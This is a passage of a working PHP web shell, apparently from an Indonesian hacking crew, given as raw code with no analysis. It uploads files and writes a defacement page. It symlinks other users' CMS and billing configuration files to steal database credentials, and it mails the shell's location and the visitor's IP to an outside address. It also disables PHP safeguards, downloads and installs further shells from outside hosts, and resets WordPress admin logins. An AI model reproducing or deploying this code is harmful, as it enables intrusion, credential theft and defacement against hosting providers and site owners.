if(isset($_POST['uploads'])){
if(@copy($_FILES['file']['tmp_name'], $_POST['uploadto'].'/'.$_FILES['file']['name'])) {

echo '<font class="olenk4">[+] Upload Sukses ^_^ [+]</font><br/> ==> '.$_POST['uploadto']."/".$_FILES['file']['name'];
} else {
echo '<font class="olenk5">[~] Njirrr gagal kang T_T [~]</font><br>';
}
}
?>
<?php
if(isset($_GET['idb']) && ($_GET['idb'] == 'deface')){
$htcs = "
<html>
<head>
<title>HACKED ?? NO BUT IDBTE4M ON THE WAY ...</title><link href='http://idbteamroot.wap.sh/image/favicon.ico' rel='shortcut icon'/>
<meta content='IDBTE4M' name='description'/>
<meta content='IDBTE4M' name='keywords'/>
<meta content='IDBTE4M' name='Abstract'/>
<meta name='title' content='OL3NK_T34'>

<link href='http://fonts.googleapis.com/css?family=Iceland:400,700' rel='stylesheet' type='text/css'>
   <link href='http://fonts.googleapis.com/css?family=Verdana:400,700' rel='stylesheet' type='text/css'>
        <link href='http://fonts.googleapis.com/css?family=Rockwell Condensed:400,700' rel='stylesheet' type='text/css'>
   <link href='http://fonts.googleapis.com/css?family=Courier New:400,700' rel='stylesheet' type='text/css'>
<head>
<html>
<center><embed src='https://www.youtube.com/v/8-HC3iUXw34?rel=0&amp;autoplay=1&image=http://3.bp.blogspot.com/-RkTUcTZVXTY/UKgyroYk_xI/AAAAAAAAAF8/gUR3-QONm44/s1600/Untitled.png&repeat=always&autostart=true&frontcolor=cccccc&lightcolor=428cdb&backcolor=111111' width='1' height='1 allowscriptaccess='always'></embed></center>
<script language='JavaScript'>
function tb5_makeArray(n){
 this.length = n;
 return this.length;
}

tb5_messages = new tb5_makeArray(1);
tb5_messages[0] = 'HACKED ?? NO BUT IDBTE4M ON THE WAY ...';
tb5_rptType = 'infinite';
tb5_rptNbr = 10;
tb5_speed = 50;
tb5_delay = 2000;
var tb5_counter=1;
var tb5_currMsg=0;
var tb5_stsmsg='';
function tb5_shuffle(arr){
var k;
for (i=0; i<arr.length; i++){
 k = Math.round(Math.random() * (arr.length - i - 1)) + i;
 temp = arr[i];arr[i]=arr[k];arr[k]=temp;
}
return arr;
}
tb5_arr = new tb5_makeArray(tb5_messages[tb5_currMsg].length);
tb5_sts = new tb5_makeArray(tb5_messages[tb5_currMsg].length);
for (var i=0; i<tb5_messages[tb5_currMsg].length; i++){
 tb5_arr[i] = i;
 tb5_sts[i] = '_';
}
tb5_arr = tb5_shuffle(tb5_arr);
function tb5_init(n){
var k;
if (n == tb5_arr.length){
 if (tb5_currMsg == tb5_messages.length-1){
 if ((tb5_rptType == 'finite') && (tb5_counter==tb5_rptNbr)){
 clearTimeout(tb5_timerID);
 return;
 }
 tb5_counter++;
 tb5_currMsg=0;
 }
 else{
 tb5_currMsg++;
 }
 n=0;
 tb5_arr = new tb5_makeArray(tb5_messages[tb5_currMsg].length);
 tb5_sts = new tb5_makeArray(tb5_messages[tb5_currMsg].length);
 for (var i=0; i<tb5_messages[tb5_currMsg].length; i++){
 tb5_arr[i] = i;
 tb5_sts[i] = '_';
 }
 tb5_arr = tb5_shuffle(tb5_arr);
 tb5_sp=tb5_delay;
}
else{
 tb5_sp=tb5_speed;
 k = tb5_arr[n];
 tb5_sts[k] = tb5_messages[tb5_currMsg].charAt(k);
 tb5_stsmsg = '';
 for (var i=0; i<tb5_sts.length; i++)
 tb5_stsmsg += tb5_sts[i];
 document.title = tb5_stsmsg;
 n++;
 }
 tb5_timerID = setTimeout('tb5_init('+n+')', tb5_sp);
}
function tb5_randomizetitle(){
 tb5_init(0);
}
tb5_randomizetitle();

</script>
<style>
#loader{
   height: 100%;
   width: 100%;
   background-color: rgba(0,0,0,0.8);
   position: fixed;
   top: 0px;
   left: 0px;
   z-index: 100;
   font-size: 40px;
   color: white;
   text-align: center;
   display: table;
}
#loader div{
   display: table-cell;
   vertical-align: middle;
}

#loader div span {
   font-family: Helvetica;
}

#mg img:hover {
-webkit-animation:tremer 0.5s linear infinite;
-moz-animation:tremer 0.5s linear infinite;
-o-animation:tremer 0.5s linear infinite;
animation:tremer 0.5s linear infinite;
}
.neon{<!--coleur lootz-->
color:blue;
text-shadow: 0 0 5px red,0 0 10px red, 0 0 30px orange, 0 0 45px yellow, 0 0 60px red;
}
.like{border:4px double yellow;
box-shadow:0px 2px 20px white;
border-radius:10px;
padding:9px;
height:310px;}
#mg img{border:4px double yellow;


</style>
<body bgcolor='black'>
<body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;'>
<meta name='google-site-verification' content='IDBTE4M'/>
<meta name='google-site-verification' content='IDBTE4M'/>
<meta name='google-site-verification' content='IDBTE4M'/>
<meta name='google-site-verification' content='IDBTE4M'/>
<meta http-equiv='Content-Language' content='en-us-id'>
<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1' />
<meta http-equiv='Content-Type' content='text/html; charset=windows-1252'>
<Meta http-equiv='content-type' content='text/html; charset=windows-1254'>
<Meta http-equiv='content-type' content='text/html; charset=ISO-8859-9'>
<meta name='author' content='IDBTE4M'>
<meta name='copyright' content='IDBTE4M'/>
<meta name='description' content='IDBTE4M'>
<meta name='robots schedule' content='auto'>
<link href='http://fonts.googleapis.com/css?family=Abel:700' rel='stylesheet' type='text/css'>
<link href='http://fonts.googleapis.com/css?family=Abel:400' rel='stylesheet' type='text/css'>
<link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'>
<link href='http://fonts.googleapis.com/css?family=Wallpoet' rel='stylesheet' type='text/css'>
<link href='http://fonts.googleapis.com/css?family=Creepster' rel='stylesheet' type='text/css'>

<script type='text/javascript'> var SPklikkanan = 'TILANG';</script> <script type='text/javascript' src='https://googledrive.com/host/0B6KVua7D2SLCNDN2RW1ORmhZRWs/sp_tilang.js'></script>
<script type='text/javascript'> if (typeof document.onselectstart!='undefined') { document.onselectstart=new Function ('return false'); } else{ document.onmousedown=new Function ('return false'); document.onmouseup=new Function ('return true'); } </SCRIPT>
<body onload='effect_animation()'>

<div id='mg'>
<center><a title='OL3NK_T34'> <p class='style5'><div align='center'><table width='100%'border='0 '><tr><td align='left'><img src='http://idbteamroot.wap.sh/image/bn.png' height='150' width='250'/ </td><br /> 
<td align='center'> <img src='http://idbteamroot.wap.sh/image/dm.jpg' height='150' width='250'/ ></td><br />
<td align='right'><img src='http://goenk.wapgem.com/idb.png' height='150' width='250'/ ></td></tr></table></
</div></p></center>
<br> <center> <font face='iceland' size='6' color='silver'><b>-=[ IDBTE4M ]=</b>-</font> <p><br><b><font face='iceland' size='5' color='lime'>Touch By OL3NK_T34</font></b> </center>
</center>
<b><font color='blue' face='consolas' size='4'>
<p align='center' class='style2'><font face='Trajan Pro' size='4' color='Green' style='text-shadow: 2px 0px .2em black, -2px 2px .2em Darkcyan, -2px -2px .2em black'><b><font color='yellow'>
-=[[ MY FAMILY ]]=-<p><center>-=| ./KEFIEX404 | MANIAK KASUR | MR.K | EL-RO | ANTONIO HsH | TUAN GALAU | DEDEMIT ID | NO SCRIPT 404 |=-<p>
<center>-=| K3C0T | SIM0D | LITLE H4XORZ | ANDRIF PZF | Syntax-Error | FadliDotID_007 | SANEKALA | YUDHI DM | OL3NK_T34 |=-<p>
<center>-=| TUSBOLLED | ALL INDOXPLOIT CREW | SHOR7CUT | YOU |=-</font><p>
<font color='blue' face='consolas' size='4'>
<p align='center' class='style2'><font face='Trajan Pro' size='4' color='RED' style='text-shadow: 2px 0px .2em black, -2px 2px .2em Darkcyan, -2px -2px .2em black'><b><font color='WHITE'> 
-=[[ PBM REBORN ]]=-<P>
-=| GRETZ IDBTE4M | GOENK TEA | ./HDV | ADRIAN XDA | DIDOT | POETRA D`M | JACK D`RIPPER |=- <P>
<center>| DAY IDBTE4M | DIMAZ BN | DEMONK | KHUNAY | MR-AQ | HENDRA D`N | PETAPA GENIT | KODRAT | MUZZAM |<p>
-=| MAULANA | SIRIN | AND YOU |=-</center>
</font>



<center><table width='100%' border='2'><tr><td width='10%' align='center'><blink><font Class-'glow' color='white'><code>MY FRIENDS : </code></font></blink></td><td width='90%'><font color='yellow' size='4'><marquee><code>
[.] X-Wu7z [.] Tuan_galau [.] GrenXPaRTa [.] x'1n73ct [.] m@db100d [.] Hacker Sakit Hati [.] rsby_engel [.] [-]Sh4d0w_99[!] [.] ./$amndan404 [.] ./wi.na [.] Neneng Juhairiah[ .] Mr_Oxygen [.] ./coco [.] H3ri.ID [.] Ice Cream [.] newbie patah hati [.] Naughty_r00tz [.] DarkWireless [.] ./czw_07 [.] ./TanpaNama404 [.] xCut10n [.] Kucing Galau [.] ./anjirGBX [.] Dicky Injector [.] jepry_vuln [.] Shut_Down404 [.] Mr.404_NotFound [.] Mr.LittleHaxor [.] Mr.Ghostteror_404 [.] Mr.Dork [.] Mr.aji.192 [.] L4W_CyberDKSH404.Not_Found [.] ozlok [.] Bloc_Anon/404 [.] R3DD3V1L [.] mr.cookie_302 [.] TheDReysSQ86 [.]</code></marquee></font></td></tr></table><html><center>

</body>
</html>
";
$f =@fopen ('idbteam.php','w');
fwrite($f , $htcs);
$pg = basename(__FILE__);
}
?>
<?php
if(isset($_GET['x']) && ($_GET['x'] == 'config')){ ?> 
<form action="?y=<?php echo $pwd; ?>&amp;x=config" method="post"> 
<?php @ini_set('max_execution_time',0); @ini_set('display_errors', 0); @ini_set('file_uploads',1);
echo '
<form method="POST"><textarea cols="85" name="passwd"  rows="20">'; $uSr=file("/etc/passwd"); foreach($uSr as $usrr) { $str=explode(":",$usrr); echo $str[0]."
"; } ?>
</textarea><br>Your Folder Config Name : <input type="text" class="input" name="folfig" size=40 />
<select class="inp"  title="Select Your Type File"  name="type" size=""><option title="type txt" value=".txt">.txt<option><option title="type php" value=".php">.php<option><option title="type shtml" value=".shtml">.shtml<option><option title="type ini" value=".ini">.ini<option></select>
<input name="conf" size="80" class="ipt" value="Hajar..." type="submit"><br><br></form></center>
<?php @ini_set('html_errors',0); @ini_set('max_execution_time',0); @ini_set('display_errors', 0); @ini_set('file_uploads',1);
if ($_POST['conf']) {
$folfig = $_POST['folfig']; $type = $_POST['type'];
$functions=@ini_get("disable_functions"); if(eregi("symlink",$functions)){die ('<blink>Maaf bro fitur Symlink masih di disabled :( </blink>');}
@mkdir($folfig, 0755); 
@chdir($folfig);
$htaccess="Options Indexes FollowSymLinks
DirectoryIndex idb.phtml
AddType txt .php
AddHandler txt .php";
file_put_contents(".htaccess",$htaccess,FILE_APPEND);
$passwd=explode("
",$_POST["passwd"]); echo "<blink><center >tunggu sebentar ya ...</center></blink>";
foreach($passwd as $pwd){ $user=trim($pwd);
@symlink('/home/'.$user.'/public_html/wp-config.php',$user.'~~>wordpress'.$type.''); 
@symlink('/home/'.$user.'/public_html/
/wp-config.php',$user.'~~>wordpress-wp'.$type.'');
@symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'~~>wordpress-wp-beta'.$type.'');
@symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'~~>wordpress-beta'.$type.'');
@symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'~~>wp13-press'.$type.'');
@symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'~~>wordpress-wordpress'.$type.'');
@symlink('/home/'.$user.'/public_html/wordpress/beta/wp-config.php',$user.'~~>wordpress-wordpress-beta'.$type.'');
@symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'~~>wordpress-news'.$type.'');
@symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'~~>wordpress-new'.$type.'');
@symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'~~>wordpress'.$type.''); 
@symlink('/home/'.$user.'/public_html/web/wp-config.php',$user.'~~>wordpress-web'.$type.''); 
@symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'~~>wordpress-blogs'.$type.'');
@symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'~~>wordpress-home'.$type.'');
@symlink('/home/'.$user.'/public_html/protal/wp-config.php',$user.'~~>wordpress-protal'.$type.'');
@symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'~~>ordpress-site'.$type.'');
@symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'~~>wordpress-main'.$type.'');
@symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'~~>wordpress-test'.$type.'');
@symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.'~~>joomla'.$type.''); 
@symlink('/home/'.$user.'/public_html/configuration.php',$user.'~~>joomla'.$type.''); 
@symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'~~>joomla-home'.$type.'');
@symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'~~>joomla-joomla'.$type.'');
@symlink('/home/'.$user.'/public_html/protal/configuration.php',$user.'~~>joomla-protal'.$type.'');
@symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'~~>joomla-joo'.$type.'');
@symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'~~>joomla-cms'.$type.'');
@symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'~~>joomla-site'.$type.'');
@symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'~~>joomla-main'.$type.'');
@symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'~~>joomla-news'.$type.'');
@symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'~~>joomla-new'.$type.'');
@symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'~~>joomla-home'.$type.'');
@symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'~~>Vbulletin-forum'.$type.'');
@symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'~~>vbluttin'.$type.'');
@symlink('/home/'.$user.'/public_html/vb3/includes/config.php',$user.'~~>vbluttin3'.$type.'');
@symlink('/home/'.$user.'/public_html/forum/includes/class_core.php',$user.'~~>vbluttin-class_core.php'.$type.'');
@symlink('/home/'.$user.'/public_html/vb/includes/class_core.php',$user.'~~>vbluttin-class_core.php1'.$type.'');
@symlink('/home/'.$user.'/public_html/cc/includes/class_core.php',$user.'~~>vbluttin-class_core.php2'.$type.'');
@symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'~~>vb1-config'.$type.'');
@symlink('/home/'.$user.'/public_html/cpanel/configuration.php',$user.'~~>cpanel'.$type.'');
@symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.'~~>panel'.$type.'');
@symlink('/home/'.$user.'/public_html/host/configuration.php',$user.'~~>host'.$type.'');
@symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.'~~>hosting'.$type.'');
@symlink('/home/'.$user.'/public_html/hosts/configuration.php',$user.'~~>hosts'.$type.'');
@symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.'~~>zencart'.$type.''); 
@symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'~~>zencart-shop'.$type.''); 
@symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'~~>hop-ZCshop'.$type.''); 
@symlink('/home/'.$user.'/public_html/mk_conf.php',$user.'~~>mk-portale1'.$type.'');
@symlink('/home/'.$user.'/public_html/Settings.php',$user.'~~>smf'.$type.''); 
@symlink('/home/'.$user.'/public_html/smf/Settings.php',$user.'~~>smf-smf'.$type.''); 
@symlink('/home/'.$user.'/public_html/forum/Settings.php',$user.'~~>smf-forum'.$type.''); 
@symlink('/home/'.$user.'/public_html/forums/Settings.php',$user.'~~>smf-forums'.$type.''); 
@symlink('/home/'.$user.'/public_html/upload/includes/config.php',$user.'~~>upload'.$type.'');
@symlink('/home/'.$user.'/public_html/incl/config.php',$user.'~~>malay'.$type.'');
@symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.'~~>clents'.$type.'');
@symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.'~~>client2'.$type.'');
@symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$user.'~~>client'.$type.'');
@symlink('/home/'.$user.'/public_html/config/koneksi.php',$user.'~~>lokomedia'.$type.'');
@symlink('/home/'.$user.'/public_html/admin/config.php',$user.'~~>webconfig'.$type.'');
@symlink('/home/'.$user.'/public_html/admin/conf.php',$user.'~~>webconfig2'.$type.'');
@symlink('/home/'.$user.'/public_html/system/sistem.php',$user.'~~>lokomedia1'.$type.''); 
@symlink('/home/'.$user.'/public_html/sites/default/settings.php',$user.'~~>Drupal'.$type.'');
@symlink('/home/'.$user.'/public_html/e107_config.php',$user.'~~>e107'.$type.'');
@symlink('/home/'.$user.'/public_html/datas/config.php',$user.'~~>Seditio'.$type.'');
@symlink('/home/'.$user.'/public_html/article/config.php',$user.'~~>Nwahy'.$type.''); 
@symlink('/home/'.$user.'/public_html/connect.php',$user.'~~>PHP-Fusion'.$type.'');
@symlink('/home/'.$user.'/public_html/includes/config.php',$user.'~~>traidnt1'.$type.'');
@symlink('/home/'.$user.'/public_html/config.php',$user.'~~>4images'.$type.'');
@symlink('/home/'.$user.'/public_html/member/configuration.php',$user.'~~>1member'.$type.'') ;
@symlink('/home/'.$user.'/public_html/requires/config.php',$user.'~~>AM4SS-hosting'.$type.'');
@symlink('/home/'.$user.'/public_html/supports/includes/iso4217.php',$user.'~~>hostbills-supports'.$type.'');
@symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.'~~>hostbills-client'.$type.'');
@symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.'~~>hostbills-support'.$type.'');
@symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.'~~>hostbills-billing'.$type.'');
@symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.'~~>hostbills-billings'.$type.'');
@symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.'~~>hostbills-host'.$type.'');
@symlink('/home/'.$user.'/public_html/hosts/includes/iso4217.php',$user.'~~>hostbills-hosts'.$type.'');
@symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'~~>hostbills-hosting'.$type.'');
@symlink('/home/'.$user.'/public_html/hostings/includes/iso4217.php',$user.'~~>hostbills-hostings'.$type.'');
@symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.'~~>hostbills'.$type.'');
@symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'~~>hostbills-hostbills'.$type.'');
@symlink('/home/'.$user.'/public_html/hostbill/includes/iso4217.php',$user.'~~>hostbills-hostbill'.$type.'');
@symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'~~>billing'.$type.''); 
@symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.'~~>whm-manage'.$type.''); 
@symlink('/home/'.$user.'/public_html/my/configuration.php',$user.'~~>whm-my'.$type.''); 
@symlink('/home/'.$user.'/public_html/myshop/configuration.php',$user.'~~>whm-myshop'.$type.'');
@symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$user.'~~>sucure-whm'.$type.'');
@symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'~~>sucure-whmcs'.$type.'');
}
echo 'Selesai mas/mba bro untuk melihat hasilnya klik ~~> <blink><a href='.$folfig.'>'.$folfig.'</a></blink>';
}
}
?>
<?php
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
$tujuanmail = '[email protected]';
$x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
$pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
mail($tujuanmail, "Maho", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
?>
<?php
if (isset($_GET['idb']) && ($_GET['idb'] == 'auto')) {
?>
<form action="?&amp;idb=auto" method="post">
<?php
echo "<html><head><title>MATAMU PICEK !!!!</title>";
echo "<body bgcolor='black'>";
echo "<center><h1><font color='blue'>IndahNya Berbagi<br/>IDB-TE4M</font></center></head>
</h1><hr><br/>";
echo "<font color='yellow'><center>-=[ IDBTE4M ]=- -=[ HGL10]=- -=[ BN ]=-</center></font><br/><br/><form method='POST'>";
echo "<font size='6' color='blue'><center>MINTA IJIN DULU SAMA SERVER</center></font><br/>";
echo "<div align='center'>";
echo "<input type='submit' name='idb' value='IJIN SERVER'><br/> <br/>";
echo "</div>";
echo "<font size='5' color='blue'><center>PILIH SALAH SATU VERSI CGI DIBAWAH</center></font><br/>";
echo "<div align='center'>";
echo "<input type='submit' name='te4m' value='-=[ HsH ]=-'> ";
echo "<input type='submit' name='te4m1' value='-=[ AUTO ]=-'> ";
echo "<input type='submit' name='te4m2' value='-=[ WHM KILL ]=-'> ";
echo "<input type='submit' name='te4m3' value='-=[ DM SHELL ]=-'> ";
echo "<input type='submit' name='te4m4' value='-=[ BN CGI ]=-'></p> ";
echo "<input type='submit' name='te4m5' value='-=[ SABUN ]=-'></p> ";
echo "<input type='submit' name='te4m6' value='-=[ WHMCS KILL ]=-'></p> ";
echo "<input type='submit' name='te4m7' value='-=[ TES ]=-'></p> ";
echo "</div>";


$sh = 'file_get_contents'; 

if($_POST['idb']) {
$ini = "php.ini";
$open = fopen($ini, 'w');
$source = ("safe_mode = OFF n
disable_functions = NONE n
safe_mode_gid = OFF n
open_basedir = OFF n
register_globals = ON n
exec = ON n
shell_exec = ON n");
fwrite($open, $source);
echo "<font color='lime'>";
if($open) {
echo '<hr><p>ijin diterima, silahkan pilih tools sesuai keinginan :) </p>';
}
else {
echo "<font color='blue'>";
echo '<hr><p>GAGAL kang </p>';
echo "</font>";
fclose($open);
} } 

if($_POST['te4m']) {
$cgi = 'http://el-ro.yu.tl/files/in.zip';
$get11 = $sh($cgi);
$idbk = fopen('hsh.php', 'w');
fwrite($idbk,$get11);
fclose($idbk);
{
@chmod('hsh.php',0755);
}
echo "<font color='aqua'>";
echo "<hr>shell hsh sukses dibuat :D <br/>
Silahkan kunjungi http://alamat-domain-kamu/hsh.php atau lihat hasilnya <a href='hsh.php' target='_blank'>DISINI</a></center></br>"; 
echo "</font>";
}
echo "</font>";

if($_POST['te4m1']) {
$cgi = 'http://el-ro.yu.tl/files/beiz.zip';
$get11 = $sh($cgi);
$idbk = fopen('info.php', 'w');
fwrite($idbk,$get11);
fclose($idbk);
{
@chmod('info.php',0755);
}
echo "<font color='aqua'>";
echo "<hr>tools sukses dibuat :D <br/>
Silahkan kunjungi http://alamat-domain-kamu/info.php atau lihat hasilnya <a href='info.php' target='_blank'>DISINI</a></center></br>"; 
echo "</font>";
}
echo "</font>";

if($_POST['te4m2']) {
$cgi = 'http://el-ro.yu.tl/files/whm.zip';
$get11 = $sh($cgi);
$idbk = fopen('whm.php', 'w');
fwrite($idbk,$get11);
fclose($idbk);
{
@chmod('whm.php',0755);
}
echo "<font color='aqua'>";
echo "<hr>whm killer sukses dibuat :D <br/>
Silahkan kunjungi http://alamat-domain-kamu/whm.php atau lihat hasilnya <a href='whm.php' target='_blank'>DISINI</a></center></br>"; 
echo "</font>";
}
echo "</font>";

if($_POST['te4m3']) {
$cgi = 'http://el-ro.yu.tl/files/dm.zip';
$get11 = $sh($cgi);
$idbk = fopen('links.php', 'w');
fwrite($idbk,$get11);
fclose($idbk);
{
@chmod('links.php',0755);
}
echo "<font color='aqua'>";
echo "<hr>shell DM sukses dibuat :D <br/>
Silahkan kunjungi http://alamat-domain-kamu/links.php atau lihat hasilnya <a href='links.php' target='_blank'>DISINI</a></center></br>"; 
echo "</font>";
}
echo "</font>";
if($_POST['te4m5']) {
$cgi = 'http://kefiex.yu.tl/files/sabun.zip';
$get11 = $sh($cgi);
$idbk = fopen('sabun.php', 'w');
fwrite($idbk,$get11);
fclose($idbk);
{
@chmod('sabun.php',0755);
}
echo "<font color='aqua'>";
echo "<hr>sabun massal :D <br/>
Silahkan kunjungi http://alamat-domain-kamu/sabun.php atau lihat hasilnya <a href='sabun.php' target='_blank'>DISINI</a></center></br>"; 
echo "</font>";
}
echo "</font>";
if($_POST['te4m6']) {
$cgi = 'http://kefiex.yu.tl/files/olenk.zip';
$get11 = $sh($cgi);
$idbk = fopen('bn.php', 'w');
fwrite($idbk,$get11);
fclose($idbk);
{
@chmod('bn.php',0755);
}
echo "<font color='aqua'>";
echo "<hr>config kill :D <br/>
Silahkan kunjungi http://alamat-domain-kamu/bn.php atau lihat hasilnya <a href='bn.php' target='_blank'>DISINI</a></center></br>"; 
echo "</font>";
}
echo "</font>";
if($_POST['te4m4']) {
$cgi = 'http://kefiex.yu.tl/files/b.zip';
$get11 = $sh($cgi);
$idb1k = fopen('.pl', 'w');
fwrite($idb1k,$get11);
fclose($idb1k);
{
@chmod('.pl',0755);
}
echo "<font color='aqua'>";
echo "<hr>CGIProxy sukses dibuat :D <br/>
Silahkan kunjungi http://alamat-domain-kamu/.pl atau lihat hasilnya <a href='.pl' target='_blank'>DISINI</a></center></br>"; 
echo "</font>";
}
echo "</font>";
if($_POST['te4m7']) {
$cgi = 'http://kefiex.yu.tl/files/hsh.zip';
$get11 = $sh($cgi);
$idb1k = fopen('hsh.zip', 'get');
fwrite($idb1k,$get11);
fclose($idb1k);
{
@chmod('hsh',0755);
}
echo "<font color='aqua'>";
echo "<hr>CGIProxy sukses dibuat :D <br/>
Silahkan kunjungi http://alamat-domain-kamu/.pl atau lihat hasilnya <a href='hsh' target='_blank'>DISINI</a></center></br>"; 
echo "</font>";
}
echo "</font>";
}
?>
<?php
if (isset($_GET['idb']) && ($_GET['idb'] == 'domain')) { ?>
<form action="?idb=domain" method="post">

<?php
    echo '<br><br></center><br><br><div class=content>';
    $file = @implode(@file("/etc/named.conf"));
    if (!$file) {
        die("can't ReaD -> [ /etc/named.conf ");
    }
    preg_match_all("#named/(.*?).db#", $file, $r);
    $domains = array_unique($r[1]);
    //check();
    //if(isset($_GET['ShowAll']))
    {
        echo "<table align=center border=1 width=59% cellpadding=5>
<tr><td colspan=2>[+] ADA [ <b>" . count($domains) . "</b> ] DOMAIN</td></tr>
<tr><td>Domain</td><td>User</td></tr>";
        foreach ($domains as $domain) {
            $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domain));
            echo "<tr><td>$domain</td><td>" . $user['name'] . "</td></tr>";
        }
        echo "</table>";
    }
    echo '</div>';
}
?>
<?php
if (isset($_GET['idb']) && ($_GET['idb'] == 'sql')) {
echo "<center><br/><br/><nobr><b><span class='b7'>O=:[ MYSQL</span> <span class='b8'>MANAGER ]:=O</span></b></nobr><br/><br/> ";
echo "</br></br><center><b><span class='b11'> You Can Go To : <a href='s/db.php' target='_blank'>[+] HERE [+]</a></center></span></br>";
if (!is_dir('s')) {
$mk = @mkdir('s', 0777);
@fwrite($f, $c);
$f2 = @fopen('s/db.php', 'w');
$sml_db = "";
$write = fwrite($f2, base64_decode($sml_db));
if ($write) {
@chmod('s/db.php', 0755);
}
echo "</br></br><center><b>GO TO : <a href='s/db.php' target='_blank'>[+] MYSQL MANAGER [+]</a></center></br>";
}
}
?>
<?php
if (isset($_GET['idb']) && ($_GET['idb'] == 'olenk1')) {
?>
<form action="?&amp;idb=olenk1" method="post">
<?php
//Tu5b0l3d
//IndoXploit
//recode by OL3NK_T34
@session_start();
@error_reporting(0);
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('display_errors', 0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
   if($_POST){
      $host = $_POST['host'];
      $username = $_POST['username'];
      $password = $_POST['password'];
      $db = $_POST['db'];
      $dbprefix = $_POST['dbprefix'];
      $user_baru = $_POST['user_baru'];
      $password_baru = $_POST['password_baru'];
      $prefix = $db.".".$dbprefix."users";
       $tanya = $_POST['tanya'];
       $target = $_POST['target'];
       $nick = $_POST['nick'];
      $pass = md5("$password_baru");
      

      mysql_connect($host,$username,$password) or die("Koneksi gagal.. isi data yg bener");
      mysql_select_db($db) or die("Database tidak bisa dibuka.. Isi data yg bener");

      $tampil=mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
         $r=mysql_fetch_array($tampil);
        $id = $r[ID];

         mysql_query("UPDATE $prefix SET user_pass='$pass',user_login='$user_baru' WHERE ID='$id'");

         


         if($tanya=="y"){

   function ambilKata($param, $kata1, $kata2){
   if(strpos($param, $kata1) === FALSE) return FALSE;
   if(strpos($param, $kata2) === FALSE) return FALSE;
   $start = strpos($param, $kata1) + strlen($kata1);
   $end = strpos($param, $kata2, $start);
   $return = substr($param, $start, $end - $start);
   return $return;
}

   function anucurl($sites){
      $ch1 = curl_init ("$sites");
curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch1, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch1, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch1, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch1, CURLOPT_COOKIEJAR,'coker_log');
curl_setopt($ch1, CURLOPT_COOKIEFILE,'coker_log');
$data = curl_exec ($ch1);
return $data;
   }

   function lohgin($cek, $web, $userr, $pass){
      $post = array(
               "log" => "$userr",
               "pwd" => "$pass",
               "rememberme" => "forever",
               "wp-submit" => "Log In",
               "redirect_to" => "$web/wp-admin/",
               "testcookie" => "1",
               );
$ch = curl_init ("$cek");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
